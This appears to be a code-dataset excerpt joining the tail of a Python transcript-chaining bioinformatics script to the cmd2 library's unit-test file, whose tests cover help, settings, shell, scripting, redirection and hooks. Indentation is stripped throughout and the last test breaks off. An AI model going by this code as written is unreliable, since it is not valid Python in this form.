rec1 = {'superPBID': r0['superPBID']}
rec2 = {'superPBID': r0['superPBID']}
for c in chain:
rec1[c] = answer[c]
rec2[c] = str(answer2[c])
writer1.writerow(rec1)
writer2.writerow(rec2)
f1.close()
f2.close()
shutil.copyfile('tmp_' + chain[-1] + '.gff', 'all_samples.chained.gff')
if fastq_filename is not None:
shutil.copyfile('tmp_' + chain[-1] + '.rep.fq', 'all_samples.chained.rep.fq')
print("Chained output written to:", file=sys.stdout)
print("all_samples.chained.gff", file=sys.stdout)
print(f1.name, file=sys.stdout)
print(f2.name, file=sys.stdout)
if fastq_filename is not None:
print("all_samples.chained.rep.fq", file=sys.stdout)
if __name__ == "__main__":
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument("config_file")
parser.add_argument("field_to_use", choices=['norm_fl', 'count_fl'], default='count_fl', help="Which count field to use for chained sample (default: count_fl)")
parser.add_argument("--fuzzy_junction", default=0, type=int, help="Max allowed distance in junction to be considered identical (default: 0 bp)")
parser.add_argument("--dun-merge-5-shorter", action="store_false", dest="allow_5merge", default=True, help="Don't collapse shorter 5' transcripts (default: off)")
parser.add_argument("--max_3_diff", type=int, default=30, help="Maximum 3' difference allowed (default: 30bp)")
parser.add_argument("--cpus", type=int, default=8, help="Number of CPUs to use for multi-threading (default: 8)")
args = parser.parse_args()
sample_dirs, sample_names, group_filename, gff_filename, count_filename, fastq_filename = read_config(args.config_file)
chain_samples_multithread(sample_dirs, sample_names, group_filename, gff_filename, count_filename, args.field_to_use, args.fuzzy_junction, args.allow_5merge, args.max_3_diff, fastq_filename, cpus=args.cpus)
|
test_cmd2.py
|
# coding=utf-8
# flake8: noqa E302
"""
Cmd2 unit/functional testing
"""
import argparse
import builtins
import io
import os
import sys
import tempfile
from code import InteractiveConsole
import pytest
import cmd2
from cmd2 import COMMAND_NAME, ansi, clipboard, constants, exceptions, plugin, utils
from .conftest import (
HELP_HISTORY,
SHORTCUTS_TXT,
SHOW_LONG,
SHOW_TXT,
complete_tester,
normalize,
odd_file_names,
run_cmd,
verify_help_text,
)
# Python 3.5 had some regressions in the unitest.mock module, so use 3rd party mock if available
try:
import mock
except ImportError:
from unittest import mock
def CreateOutsimApp():
c = cmd2.Cmd()
c.stdout = utils.StdSim(c.stdout)
return c
@pytest.fixture
def outsim_app():
return CreateOutsimApp()
def test_version(base_app):
assert cmd2.__version__
def test_not_in_main_thread(base_app, capsys):
import threading
cli_thread = threading.Thread(name='cli_thread', target=base_app.cmdloop)
cli_thread.start()
cli_thread.join()
out, err = capsys.readouterr()
assert "cmdloop must be run in the main thread" in err
def test_empty_statement(base_app):
out, err = run_cmd(base_app, '')
expected = normalize('')
assert out == expected
def test_base_help(base_app):
out, err = run_cmd(base_app, 'help')
verify_help_text(base_app, out)
def test_base_help_verbose(base_app):
out, err = run_cmd(base_app, 'help -v')
verify_help_text(base_app, out)
# Make sure :param type lines are filtered out of help summary
help_doc = base_app.do_help.__func__.__doc__
help_doc += "\n:param fake param"
base_app.do_help.__func__.__doc__ = help_doc
out, err = run_cmd(base_app, 'help --verbose')
verify_help_text(base_app, out)
assert ':param' not in ''.join(out)
def test_base_argparse_help(base_app):
# Verify that "set -h" gives the same output as "help set" and that it starts in a way that makes sense
out1, err1 = run_cmd(base_app, 'set -h')
out2, err2 = run_cmd(base_app, 'help set')
assert out1 == out2
assert out1[0].startswith('Usage: set')
assert out1[1] == ''
assert out1[2].startswith('Set a settable parameter')
def test_base_invalid_option(base_app):
out, err = run_cmd(base_app, 'set -z')
assert err[0] == 'Usage: set [-h] [-v] [param] [value]'
assert 'Error: unrecognized arguments: -z' in err[1]
def test_base_shortcuts(base_app):
out, err = run_cmd(base_app, 'shortcuts')
expected = normalize(SHORTCUTS_TXT)
assert out == expected
def test_command_starts_with_shortcut():
with pytest.raises(ValueError) as excinfo:
app = cmd2.Cmd(shortcuts={'help': 'fake'})
assert "Invalid command name 'help'" in str(excinfo.value)
def test_base_show(base_app):
# force editor to be 'vim' so test is repeatable across platforms
base_app.editor = 'vim'
out, err = run_cmd(base_app, 'set')
expected = normalize(SHOW_TXT)
assert out == expected
def test_base_show_long(base_app):
# force editor to be 'vim' so test is repeatable across platforms
base_app.editor = 'vim'
out, err = run_cmd(base_app, 'set -v')
expected = normalize(SHOW_LONG)
assert out == expected
def test_set(base_app):
out, err = run_cmd(base_app, 'set quiet True')
expected = normalize("""
quiet - was: False
now: True
""")
assert out == expected
out, err = run_cmd(base_app, 'set quiet')
assert out == ['quiet: True']
def test_set_val_empty(base_app):
base_app.editor = "fake"
out, err = run_cmd(base_app, 'set editor ""')
assert base_app.editor == ''
def test_set_val_is_flag(base_app):
base_app.editor = "fake"
out, err = run_cmd(base_app, 'set editor "-h"')
assert base_app.editor == '-h'
def test_set_not_supported(base_app):
out, err = run_cmd(base_app, 'set qqq True')
expected = normalize("""
Parameter 'qqq' not supported (type 'set' for list of parameters).
""")
assert err == expected
def test_set_no_settables(base_app):
base_app.settables = {}
out, err = run_cmd(base_app, 'set quiet True')
expected = normalize("There are no settable parameters")
assert err == expected
@pytest.mark.parametrize('new_val, is_valid, expected', [
(ansi.STYLE_NEVER, True, ansi.STYLE_NEVER),
('neVeR', True, ansi.STYLE_NEVER),
(ansi.STYLE_TERMINAL, True, ansi.STYLE_TERMINAL),
('TeRMInal', True, ansi.STYLE_TERMINAL),
(ansi.STYLE_ALWAYS, True, ansi.STYLE_ALWAYS),
('AlWaYs', True, ansi.STYLE_ALWAYS),
('invalid', False, ansi.STYLE_TERMINAL),
])
def test_set_allow_style(base_app, new_val, is_valid, expected):
# Initialize allow_style for this test
ansi.allow_style = ansi.STYLE_TERMINAL
# Use the set command to alter it
out, err = run_cmd(base_app, 'set allow_style {}'.format(new_val))
# Verify the results
assert ansi.allow_style == expected
if is_valid:
assert not err
assert "now: {!r}".format(new_val.capitalize()) in out[1]
# Reset allow_style to its default since it's an application-wide setting that can affect other unit tests
ansi.allow_style = ansi.STYLE_TERMINAL
class OnChangeHookApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.add_settable(utils.Settable('quiet', bool, "my description", onchange_cb=self._onchange_quiet))
def _onchange_quiet(self, name, old, new) -> None:
"""Runs when quiet is changed via set command"""
self.poutput("You changed " + name)
@pytest.fixture
def onchange_app():
app = OnChangeHookApp()
return app
def test_set_onchange_hook(onchange_app):
out, err = run_cmd(onchange_app, 'set quiet True')
expected = normalize("""
quiet - was: False
now: True
You changed quiet
""")
assert out == expected
def test_base_shell(base_app, monkeypatch):
m = mock.Mock()
monkeypatch.setattr("{}.Popen".format('subprocess'), m)
out, err = run_cmd(base_app, 'shell echo a')
assert out == []
assert m.called
def test_shell_last_result(base_app):
base_app.last_result = None
run_cmd(base_app, 'shell fake')
assert base_app.last_result is not None
def test_shell_manual_call(base_app):
# Verifies crash from Issue #986 doesn't happen
cmds = [
'echo "hi"',
'echo "there"',
'echo "cmd2!"'
]
cmd = ';'.join(cmds)
base_app.do_shell(cmd)
cmd = '&&'.join(cmds)
base_app.do_shell(cmd)
def test_base_py(base_app):
# Make sure py can't edit Cmd.py_locals. It used to be that cmd2 was passing its py_locals
# dictionary to the py environment instead of a shallow copy.
base_app.py_locals['test_var'] = 5
out, err = run_cmd(base_app, 'py del[locals()["test_var"]]')
assert not out and not err
assert base_app.py_locals['test_var'] == 5
out, err = run_cmd(base_app, 'py print(test_var)')
assert out[0].rstrip() == '5'
# Place an editable object in py_locals. Since we make a shallow copy of py_locals,
# this object should be editable from the py environment.
base_app.py_locals['my_list'] = []
out, err = run_cmd(base_app, 'py my_list.append(2)')
assert not out and not err
assert base_app.py_locals['my_list'][0] == 2
# Try a print statement
out, err = run_cmd(base_app, 'py print("spaces" + " in this " + "command")')
assert out[0].rstrip() == 'spaces in this command'
# Set self_in_py to True and make sure we see self
base_app.self_in_py = True
out, err = run_cmd(base_app, 'py print(self)')
assert 'cmd2.cmd2.Cmd object' in out[0]
# Set self_in_py to False and make sure we can't see self
base_app.self_in_py = False
out, err = run_cmd(base_app, 'py print(self)')
assert "NameError: name 'self' is not defined" in err
def test_base_error(base_app):
out, err = run_cmd(base_app, 'meow')
assert "is not a recognized command" in err[0]
def test_run_script(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'script.txt')
assert base_app._script_dir == []
assert base_app._current_script_dir is None
# Get output out the script
script_out, script_err = run_cmd(base_app, 'run_script {}'.format(filename))
assert base_app._script_dir == []
assert base_app._current_script_dir is None
# Now run the commands manually and compare their output to script's
with open(filename, encoding='utf-8') as file:
script_commands = file.read().splitlines()
manual_out = []
manual_err = []
for cmdline in script_commands:
out, err = run_cmd(base_app, cmdline)
manual_out.extend(out)
manual_err.extend(err)
assert script_out == manual_out
assert script_err == manual_err
def test_run_script_with_empty_args(base_app):
out, err = run_cmd(base_app, 'run_script')
assert "the following arguments are required" in err[1]
def test_run_script_with_nonexistent_file(base_app, capsys):
out, err = run_cmd(base_app, 'run_script does_not_exist.txt')
assert "does not exist" in err[0]
def test_run_script_with_directory(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
out, err = run_cmd(base_app, 'run_script {}'.format(test_dir))
assert "is not a file" in err[0]
def test_run_script_with_empty_file(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'scripts', 'empty.txt')
out, err = run_cmd(base_app, 'run_script {}'.format(filename))
assert not out and not err
def test_run_script_with_binary_file(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'scripts', 'binary.bin')
out, err = run_cmd(base_app, 'run_script {}'.format(filename))
assert "is not an ASCII or UTF-8 encoded text file" in err[0]
def test_run_script_with_python_file(base_app, request):
m = mock.MagicMock(name='input', return_value='2')
builtins.input = m
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'pyscript', 'stop.py')
out, err = run_cmd(base_app, 'run_script {}'.format(filename))
assert "appears to be a Python file" in err[0]
def test_run_script_with_utf8_file(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'scripts', 'utf8.txt')
assert base_app._script_dir == []
assert base_app._current_script_dir is None
# Get output out the script
script_out, script_err = run_cmd(base_app, 'run_script {}'.format(filename))
assert base_app._script_dir == []
assert base_app._current_script_dir is None
# Now run the commands manually and compare their output to script's
with open(filename, encoding='utf-8') as file:
script_commands = file.read().splitlines()
manual_out = []
manual_err = []
for cmdline in script_commands:
out, err = run_cmd(base_app, cmdline)
manual_out.extend(out)
manual_err.extend(err)
assert script_out == manual_out
assert script_err == manual_err
def test_run_script_nested_run_scripts(base_app, request):
# Verify that running a script with nested run_script commands works correctly,
# and runs the nested script commands in the correct order.
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'scripts', 'nested.txt')
# Run the top level script
initial_run = 'run_script ' + filename
run_cmd(base_app, initial_run)
# Check that the right commands were executed.
expected = """
%s
_relative_run_script precmds.txt
set allow_style Always
help
shortcuts
_relative_run_script postcmds.txt
set allow_style Never""" % initial_run
out, err = run_cmd(base_app, 'history -s')
assert out == normalize(expected)
def test_runcmds_plus_hooks(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
prefilepath = os.path.join(test_dir, 'scripts', 'precmds.txt')
postfilepath = os.path.join(test_dir, 'scripts', 'postcmds.txt')
base_app.runcmds_plus_hooks(['run_script ' + prefilepath,
'help',
'shortcuts',
'run_script ' + postfilepath])
expected = """
run_script %s
set allow_style Always
help
shortcuts
run_script %s
set allow_style Never""" % (prefilepath, postfilepath)
out, err = run_cmd(base_app, 'history -s')
assert out == normalize(expected)
def test_runcmds_plus_hooks_ctrl_c(base_app, capsys):
"""Test Ctrl-C while in runcmds_plus_hooks"""
import types
def do_keyboard_interrupt(self, _):
raise KeyboardInterrupt('Interrupting this command')
setattr(base_app, 'do_keyboard_interrupt', types.MethodType(do_keyboard_interrupt, base_app))
# Default behavior is to stop command loop on Ctrl-C
base_app.history.clear()
base_app.runcmds_plus_hooks(['help', 'keyboard_interrupt', 'shortcuts'])
out, err = capsys.readouterr()
assert err.startswith("Interrupting this command")
assert len(base_app.history) == 2
# Ctrl-C should not stop command loop in this case
base_app.history.clear()
base_app.runcmds_plus_hooks(['help', 'keyboard_interrupt', 'shortcuts'], stop_on_keyboard_interrupt=False)
out, err = capsys.readouterr()
assert not err
assert len(base_app.history) == 3
def test_relative_run_script(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'script.txt')
assert base_app._script_dir == []
assert base_app._current_script_dir is None
# Get output out the script
script_out, script_err = run_cmd(base_app, 'run_script {}'.format(filename))
assert base_app._script_dir == []
assert base_app._current_script_dir is None
# Now run the commands manually and compare their output to script's
with open(filename, encoding='utf-8') as file:
script_commands = file.read().splitlines()
manual_out = []
manual_err = []
for cmdline in script_commands:
out, err = run_cmd(base_app, cmdline)
manual_out.extend(out)
manual_err.extend(err)
assert script_out == manual_out
assert script_err == manual_err
@pytest.mark.parametrize('file_name', odd_file_names)
def test_relative_run_script_with_odd_file_names(base_app, file_name, monkeypatch):
"""Test file names with various patterns"""
# Mock out the do_run_script call to see what args are passed to it
run_script_mock = mock.MagicMock(name='do_run_script')
monkeypatch.setattr("cmd2.Cmd.do_run_script", run_script_mock)
run_cmd(base_app, "_relative_run_script {}".format(utils.quote_string(file_name)))
run_script_mock.assert_called_once_with(utils.quote_string(file_name))
def test_relative_run_script_requires_an_argument(base_app):
out, err = run_cmd(base_app, '_relative_run_script')
assert 'Error: the following arguments' in err[1]
def test_in_script(request):
class HookApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.register_cmdfinalization_hook(self.hook)
def hook(self: cmd2.Cmd, data: plugin.CommandFinalizationData) -> plugin.CommandFinalizationData:
if self.in_script():
self.poutput("WE ARE IN SCRIPT")
return data
hook_app = HookApp()
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'script.txt')
out, err = run_cmd(hook_app, 'run_script {}'.format(filename))
assert "WE ARE IN SCRIPT" in out[-1]
def test_system_exit_in_command(base_app, capsys):
"""Test raising SystemExit from a command"""
import types
def do_system_exit(self, _):
raise SystemExit
setattr(base_app, 'do_system_exit', types.MethodType(do_system_exit, base_app))
stop = base_app.onecmd_plus_hooks('system_exit')
assert stop
def test_output_redirection(base_app):
fd, filename = tempfile.mkstemp(prefix='cmd2_test', suffix='.txt')
os.close(fd)
try:
# Verify that writing to a file works
run_cmd(base_app, 'help > {}'.format(filename))
with open(filename) as f:
content = f.read()
verify_help_text(base_app, content)
# Verify that appending to a file also works
run_cmd(base_app, 'help history >> {}'.format(filename))
with open(filename) as f:
appended_content = f.read()
assert appended_content.startswith(content)
assert len(appended_content) > len(content)
except Exception:
raise
finally:
os.remove(filename)
def test_output_redirection_to_nonexistent_directory(base_app):
filename = '~/fakedir/this_does_not_exist.txt'
out, err = run_cmd(base_app, 'help > {}'.format(filename))
assert 'Failed to redirect' in err[0]
out, err = run_cmd(base_app, 'help >> {}'.format(filename))
assert 'Failed to redirect' in err[0]
def test_output_redirection_to_too_long_filename(base_app):
filename = '~/sdkfhksdjfhkjdshfkjsdhfkjsdhfkjdshfkjdshfkjshdfkhdsfkjhewfuihewiufhweiufhiweufhiuewhiuewhfiuwehfia' \
'ewhfiuewhfiuewhfiuewhiuewhfiuewhfiuewfhiuwehewiufhewiuhfiweuhfiuwehfiuewfhiuwehiuewfhiuewhiewuhfiueh' \
'fiuwefhewiuhewiufhewiufhewiufhewiufhewiufhewiufhewiufhewiuhewiufhewiufhewiuheiufhiuewheiwufhewiufheu' \
'fheiufhieuwhfewiuhfeiufhiuewfhiuewheiwuhfiuewhfiuewhfeiuwfhewiufhiuewhiuewhfeiuwhfiuwehfuiwehfiuehie' \
'whfieuwfhieufhiuewhfeiuwfhiuefhueiwhfw'
out, err = run_cmd(base_app, 'help > {}'.format(filename))
assert 'Failed to redirect' in err[0]
out, err = run_cmd(base_app, 'help >> {}'.format(filename))
assert 'Failed to redirect' in err[0]
def test_feedback_to_output_true(base_app):
base_app.feedback_to_output = True
base_app.timing = True
f, filename = tempfile.mkstemp(prefix='cmd2_test', suffix='.txt')
os.close(f)
try:
run_cmd(base_app, 'help > {}'.format(filename))
with open(filename) as f:
content = f.readlines()
assert content[-1].startswith('Elapsed: ')
except:
raise
finally:
os.remove(filename)
def test_feedback_to_output_false(base_app):
base_app.feedback_to_output = False
base_app.timing = True
f, filename = tempfile.mkstemp(prefix='feedback_to_output', suffix='.txt')
os.close(f)
try:
out, err = run_cmd(base_app, 'help > {}'.format(filename))
with open(filename) as f:
content = f.readlines()
assert not content[-1].startswith('Elapsed: ')
assert err[0].startswith('Elapsed')
except:
raise
finally:
os.remove(filename)
def test_disallow_redirection(base_app):
# Set allow_redirection to False
base_app.allow_redirection = False
filename = 'test_allow_redirect.txt'
# Verify output wasn't redirected
out, err = run_cmd(base_app, 'help > {}'.format(filename))
verify_help_text(base_app, out)
# Verify that no file got created
assert not os.path.exists(filename)
def test_pipe_to_shell(base_app):
if sys.platform == "win32":
# Windows
command = 'help | sort'
else:
# Mac and Linux
# Get help on help and pipe it's output to the input of the word count shell command
command = 'help help | wc'
out, err = run_cmd(base_app, command)
assert out and not err
def test_pipe_to_shell_and_redirect(base_app):
filename = 'out.txt'
if sys.platform == "win32":
# Windows
command = 'help | sort > {}'.format(filename)
else:
# Mac and Linux
# Get help on help and pipe it's output to the input of the word count shell command
command = 'help help | wc > {}'.format(filename)
out, err = run_cmd(base_app, command)
assert not out and not err
assert os.path.exists(filename)
os.remove(filename)
def test_pipe_to_shell_error(base_app):
# Try to pipe command output to a shell command that doesn't exist in order to produce an error
out, err = run_cmd(base_app, 'help | foobarbaz.this_does_not_exist')
assert not out
assert "Pipe process exited with code" in err[0]
@pytest.mark.skipif(not clipboard.can_clip,
reason="Pyperclip could not find a copy/paste mechanism for your system")
def test_send_to_paste_buffer(base_app):
# Test writing to the PasteBuffer/Clipboard
run_cmd(base_app, 'help >')
paste_contents = cmd2.cmd2.get_paste_buffer()
verify_help_text(base_app, paste_contents)
# Test appending to the PasteBuffer/Clipboard
run_cmd(base_app, 'help history >>')
appended_contents = cmd2.cmd2.get_paste_buffer()
assert appended_contents.startswith(paste_contents)
assert len(appended_contents) > len(paste_contents)
def test_base_timing(base_app):
base_app.feedback_to_output = False
out, err = run_cmd(base_app, 'set timing True')
expected = normalize("""timing - was: False
now: True
""")
assert out == expected
if sys.platform == 'win32':
assert err[0].startswith('Elapsed: 0:00:00')
else:
assert err[0].startswith('Elapsed: 0:00:00.0')
def _expected_no_editor_error():
expected_exception = 'OSError'
# If PyPy, expect a different exception than with Python 3
if hasattr(sys, "pypy_translation_info"):
expected_exception = 'EnvironmentError'
expected_text = normalize("""
EXCEPTION of type '{}' occurred with message: 'Please use 'set editor' to specify your text editing program of choice.'
To enable full traceback, run the following command: 'set debug true'
""".format(expected_exception))
return expected_text
def test_base_debug(base_app):
# Purposely set the editor to None
base_app.editor = None
# Make sure we get an exception, but cmd2 handles it
out, err = run_cmd(base_app, 'edit')
expected = _expected_no_editor_error()
assert err == expected
# Set debug true
out, err = run_cmd(base_app, 'set debug True')
expected = normalize("""
debug - was: False
now: True
""")
assert out == expected
# Verify that we now see the exception traceback
out, err = run_cmd(base_app, 'edit')
assert err[0].startswith('Traceback (most recent call last):')
def test_debug_not_settable(base_app):
# Set debug to False and make it unsettable
base_app.debug = False
base_app.remove_settable('debug')
# Cause an exception
out, err = run_cmd(base_app, 'bad "quote')
# Since debug is unsettable, the user will not be given the option to enable a full traceback
assert err == ['Invalid syntax: No closing quotation']
def test_remove_settable_keyerror(base_app):
with pytest.raises(KeyError):
base_app.remove_settable('fake')
def test_edit_file(base_app, request, monkeypatch):
# Set a fake editor just to make sure we have one. We aren't really going to call it due to the mock
base_app.editor = 'fooedit'
# Mock out the subprocess.Popen call so we don't actually open an editor
m = mock.MagicMock(name='Popen')
monkeypatch.setattr("subprocess.Popen", m)
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'script.txt')
run_cmd(base_app, 'edit {}'.format(filename))
# We think we have an editor, so should expect a Popen call
m.assert_called_once()
@pytest.mark.parametrize('file_name', odd_file_names)
def test_edit_file_with_odd_file_names(base_app, file_name, monkeypatch):
"""Test editor and file names with various patterns"""
# Mock out the do_shell call to see what args are passed to it
shell_mock = mock.MagicMock(name='do_shell')
monkeypatch.setattr("cmd2.Cmd.do_shell", shell_mock)
base_app.editor = 'fooedit'
file_name = utils.quote_string('nothingweird.py')
run_cmd(base_app, "edit {}".format(utils.quote_string(file_name)))
shell_mock.assert_called_once_with('"fooedit" {}'.format(utils.quote_string(file_name)))
def test_edit_file_with_spaces(base_app, request, monkeypatch):
# Set a fake editor just to make sure we have one. We aren't really going to call it due to the mock
base_app.editor = 'fooedit'
# Mock out the subprocess.Popen call so we don't actually open an editor
m = mock.MagicMock(name='Popen')
monkeypatch.setattr("subprocess.Popen", m)
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'my commands.txt')
run_cmd(base_app, 'edit "{}"'.format(filename))
# We think we have an editor, so should expect a Popen call
m.assert_called_once()
def test_edit_blank(base_app, monkeypatch):
# Set a fake editor just to make sure we have one. We aren't really going to call it due to the mock
base_app.editor = 'fooedit'
# Mock out the subprocess.Popen call so we don't actually open an editor
m = mock.MagicMock(name='Popen')
monkeypatch.setattr("subprocess.Popen", m)
run_cmd(base_app, 'edit')
# We have an editor, so should expect a Popen call
m.assert_called_once()
def test_base_py_interactive(base_app):
# Mock out the InteractiveConsole.interact() call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='interact')
InteractiveConsole.interact = m
run_cmd(base_app, "py")
# Make sure our mock was called once and only once
m.assert_called_once()
def test_base_cmdloop_with_startup_commands():
intro = 'Hello World, this is an intro ...'
# Need to patch sys.argv so cmd2 doesn't think it was called with arguments equal to the py.test args
testargs = ["prog", 'quit']
expected = intro + '\n'
with mock.patch.object(sys, 'argv', testargs):
app = CreateOutsimApp()
app.use_rawinput = True
# Run the command loop with custom intro
app.cmdloop(intro=intro)
out = app.stdout.getvalue()
assert out == expected
def test_base_cmdloop_without_startup_commands():
# Need to patch sys.argv so cmd2 doesn't think it was called with arguments equal to the py.test args
testargs = ["prog"]
with mock.patch.object(sys, 'argv', testargs):
app = CreateOutsimApp()
app.use_rawinput = True
app.intro = 'Hello World, this is an intro ...'
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input', return_value='quit')
builtins.input = m
expected = app.intro + '\n'
# Run the command loop
app.cmdloop()
out = app.stdout.getvalue()
assert out == expected
def test_cmdloop_without_rawinput():
# Need to patch sys.argv so cmd2 doesn't think it was called with arguments equal to the py.test args
testargs = ["prog"]
with mock.patch.object(sys, 'argv', testargs):
app = CreateOutsimApp()
app.use_rawinput = False
app.echo = False
app.intro = 'Hello World, this is an intro ...'
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input', return_value='quit')
builtins.input = m
expected = app.intro + '\n'
with pytest.raises(OSError):
app.cmdloop()
out = app.stdout.getvalue()
assert out == expected
@pytest.mark.skipif(sys.platform.startswith('win'),
reason="stty sane only run on Linux/Mac")
def test_stty_sane(base_app, monkeypatch):
"""Make sure stty sane is run on Linux/Mac after each command if stdin is a terminal"""
with mock.patch('sys.stdin.isatty', mock.MagicMock(name='isatty', return_value=True)):
# Mock out the subprocess.Popen call so we don't actually run stty sane
m = mock.MagicMock(name='Popen')
monkeypatch.setattr("subprocess.Popen", m)
base_app.onecmd_plus_hooks('help')
m.assert_called_once_with(['stty', 'sane'])
class HookFailureApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# register a postparsing hook method
self.register_postparsing_hook(self.postparsing_precmd)
def postparsing_precmd(self, data: cmd2.plugin.PostparsingData) -> cmd2.plugin.PostparsingData:
"""Simulate precmd hook failure."""
data.stop = True
return data
@pytest.fixture
def hook_failure():
app = HookFailureApp()
return app
def test_precmd_hook_success(base_app):
out = base_app.onecmd_plus_hooks('help')
assert out is False
def test_precmd_hook_failure(hook_failure):
out = hook_failure.onecmd_plus_hooks('help')
assert out is True
class SayApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_say(self, arg):
self.poutput(arg)
@pytest.fixture
def say_app():
app = SayApp(allow_cli_args=False)
app.stdout = utils.StdSim(app.stdout)
return app
def test_interrupt_quit(say_app):
say_app.quit_on_sigint = True
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input')
m.side_effect = ['say hello', KeyboardInterrupt(), 'say goodbye', 'eof']
builtins.input = m
try:
say_app.cmdloop()
except KeyboardInterrupt:
pass
# And verify the expected output to stdout
out = say_app.stdout.getvalue()
assert out == 'hello\n'
def test_interrupt_noquit(say_app):
say_app.quit_on_sigint = False
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input')
m.side_effect = ['say hello', KeyboardInterrupt(), 'say goodbye', 'eof']
builtins.input = m
try:
say_app.cmdloop()
except KeyboardInterrupt:
pass
# And verify the expected output to stdout
out = say_app.stdout.getvalue()
assert out == 'hello\n^C\ngoodbye\n'
class ShellApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.default_to_shell = True
def test_default_to_shell(base_app, monkeypatch):
if sys.platform.startswith('win'):
line = 'dir'
else:
line = 'ls'
base_app.default_to_shell = True
m = mock.Mock()
monkeypatch.setattr("{}.Popen".format('subprocess'), m)
out, err = run_cmd(base_app, line)
assert out == []
assert m.called
def test_ansi_prompt_not_esacped(base_app):
from cmd2.rl_utils import rl_make_safe_prompt
prompt = '(Cmd) '
assert rl_make_safe_prompt(prompt) == prompt
def test_ansi_prompt_escaped():
from cmd2.rl_utils import rl_make_safe_prompt
app = cmd2.Cmd()
color = 'cyan'
prompt = 'InColor'
color_prompt = ansi.style(prompt, fg=color)
readline_hack_start = "\x01"
readline_hack_end = "\x02"
readline_safe_prompt = rl_make_safe_prompt(color_prompt)
assert prompt != color_prompt
if sys.platform.startswith('win'):
# PyReadline on Windows doesn't suffer from the GNU readline bug which requires the hack
assert readline_safe_prompt.startswith(ansi.fg_lookup(color))
assert readline_safe_prompt.endswith(ansi.FG_RESET)
else:
assert readline_safe_prompt.startswith(readline_hack_start + ansi.fg_lookup(color) + readline_hack_end)
assert readline_safe_prompt.endswith(readline_hack_start + ansi.FG_RESET + readline_hack_end)
class HelpApp(cmd2.Cmd):
"""Class for testing custom help_* methods which override docstring help."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_squat(self, arg):
"""This docstring help will never be shown because the help_squat method overrides it."""
pass
def help_squat(self):
self.stdout.write('This command does diddly squat...\n')
def do_edit(self, arg):
"""This overrides the edit command and does nothing."""
pass
# This command will be in the "undocumented" section of the help menu
def do_undoc(self, arg):
pass
@pytest.fixture
def help_app():
app = HelpApp()
return app
def test_custom_command_help(help_app):
out, err = run_cmd(help_app, 'help squat')
expected = normalize('This command does diddly squat...')
assert out == expected
def test_custom_help_menu(help_app):
out, err = run_cmd(help_app, 'help')
verify_help_text(help_app, out)
def test_help_undocumented(help_app):
out, err = run_cmd(help_app, 'help undoc')
assert err[0].startswith("No help on undoc")
def test_help_overridden_method(help_app):
out, err = run_cmd(help_app, 'help edit')
expected = normalize('This overrides the edit command and does nothing.')
assert out == expected
class HelpCategoriesApp(cmd2.Cmd):
"""Class for testing custom help_* methods which override docstring help."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@cmd2.with_category('Some Category')
def do_diddly(self, arg):
"""This command does diddly"""
pass
# This command will be in the "Some Category" section of the help menu even though it has no docstring
@cmd2.with_category("Some Category")
def do_cat_nodoc(self, arg):
pass
def do_squat(self, arg):
"""This docstring help will never be shown because the help_squat method overrides it."""
pass
def help_squat(self):
self.stdout.write('This command does diddly squat...\n')
def do_edit(self, arg):
"""This overrides the edit command and does nothing."""
pass
cmd2.categorize((do_squat, do_edit), 'Custom Category')
# This command will be in the "undocumented" section of the help menu
def do_undoc(self, arg):
pass
@pytest.fixture
def helpcat_app():
app = HelpCategoriesApp()
return app
def test_help_cat_base(helpcat_app):
out, err = run_cmd(helpcat_app, 'help')
verify_help_text(helpcat_app, out)
def test_help_cat_verbose(helpcat_app):
out, err = run_cmd(helpcat_app, 'help --verbose')
verify_help_text(helpcat_app, out)
class SelectApp(cmd2.Cmd):
def do_eat(self, arg):
"""Eat something, with a selection of sauces to choose from."""
# Pass in a single string of space-separated selections
sauce = self.select('sweet salty', 'Sauce? ')
result = '{food} with {sauce} sauce, yum!'
result = result.format(food=arg, sauce=sauce)
self.stdout.write(result + '\n')
def do_study(self, arg):
"""Learn something, with a selection of subjects to choose from."""
# Pass in a list of strings for selections
subject = self.select(['math', 'science'], 'Subject? ')
result = 'Good luck learning {}!\n'.format(subject)
self.stdout.write(result)
def do_procrastinate(self, arg):
"""Waste time in your manner of choice."""
# Pass in a list of tuples for selections
leisure_activity = self.select([('Netflix and chill', 'Netflix'), ('YouTube', 'WebSurfing')],
'How would you like to procrastinate? ')
result = 'Have fun procrasinating with {}!\n'.format(leisure_activity)
self.stdout.write(result)
def do_play(self, arg):
"""Play your favorite musical instrument."""
# Pass in an uneven list of tuples for selections
instrument = self.select([('Guitar', 'Electric Guitar'), ('Drums',)], 'Instrument? ')
result = 'Charm us with the {}...\n'.format(instrument)
self.stdout.write(result)
@pytest.fixture
def select_app():
app = SelectApp()
return app
def test_select_options(select_app, monkeypatch):
